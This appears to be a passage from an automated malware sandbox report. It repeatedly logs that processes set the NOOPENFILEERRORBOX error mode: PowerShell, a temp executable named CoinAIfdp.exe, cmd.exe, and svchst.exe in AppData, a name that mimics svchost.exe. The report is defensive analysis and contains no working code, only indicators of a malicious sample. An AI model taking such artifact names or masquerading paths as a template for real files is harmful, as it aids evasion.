              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
